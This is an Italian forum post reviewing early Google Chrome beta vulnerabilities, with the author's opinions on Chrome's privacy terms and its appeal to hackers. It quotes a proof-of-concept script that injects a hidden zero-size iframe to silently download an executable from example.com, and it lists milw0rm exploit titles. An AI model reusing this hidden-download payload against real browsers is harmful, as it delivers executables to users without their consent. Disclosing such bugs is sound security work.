Per chi non lo sapesse ancora (ma dubito ce ne sia qualcuno) Google Chrome e' il browser in sviluppo da Google , attualmente in beta-phase . Sono gia' stati riscontrati svariati bug , alcuni high-risk rated , come ....
*************************************************************************** Author: nerex E-mail: nerex[at]live[dot]comGoogle's new Web browser (Chrome) allows files (e.g., executables) to be automatically
downloaded to the user's computer without any user prompt. This proof-of-concept was created for educational purposes only. Use the code it at your own risk. The author will not be responsible for any damages. Tested on Windows Vista SP1 and Windows XP SP3 with Google Chrome (BETA) ************************************************************************** <script>document.write('<iframe src="http://www.example.com/hello.exe"; frameborder="0" width="0" height="0">');
</script>Questo e' uno dei piu' gravi direi . Ne abbiamo anche altri comunque da non sottovalutare . Il classico milw0rm ne ha nel database 6 .
Google Chrome Browser 0.2.149.27 Inspect Element DoS Exploit Google Chrome Browser 0.2.149.27 A HREF Denial of Service Exploit Google Chrome Browser 0.2.149.27 (SaveAs) Remote BOF Exploit Google Chrome Browser 0.2.149.27 (1583) Remote Silent Crash PoCGoogle Chrome Browser 0.2.149.27 Automatic File Download Exploit <== che e' quel che vi ho appena mostrato
Google Chrome Browser 0.2.149.27 malicious link DoS VulnerabilityPare anche che per lo sviluppo sia utilizzata un versione del webkit che soffre di bug (ovvero quella di Maggio) . Anche per quanto riguarda la privacy non ha un buon nome : basta leggere la licenza che tra le righe intende 'quel che tu fai e\' si di tuo copyright ma Google puo\' farne quel che vuole' .
Come esperienza personale , ho testato il browser : pare voler puntare a qualcosa di grosso e fino ad ora mi piace abbastanza il lavoro che stanno facendo , ma andando ad analizzare i punti appena esposti , dubito fortemente che la comunita' degli hacker sara' tanto vogliosa di abbandonare i propri browser preferiti per passare a gChrome (che tra l'altro fino ad ora , pur essendo opensource , non ha dato niente alla comunita' Linux) . A voi le opinioni , i commenti e le critiche al riguardo .
-- SystemFAILURE BioHazard Email address : root@xxxxxxxxxxxxxxxxxxxxxxxxxx Internet Relay Chat : SystemFAILURE @ #HUF @ irc.mufhd0.net Micro$oft Network : msn@xxxxxxxxxxxxxxxxxxxxxxxxxx Jabber : root@xxxxxxxxxxxxxxxxxxxxxxxxxx // HUF Founder /* Heaven Knows That I Love YOU :**: */ /* Heaven Has A Ring Around YOU , If You Don't See It , Know That It's TRUE :**: */ ProShell System Administrator // it was wonderful , many thanks to all
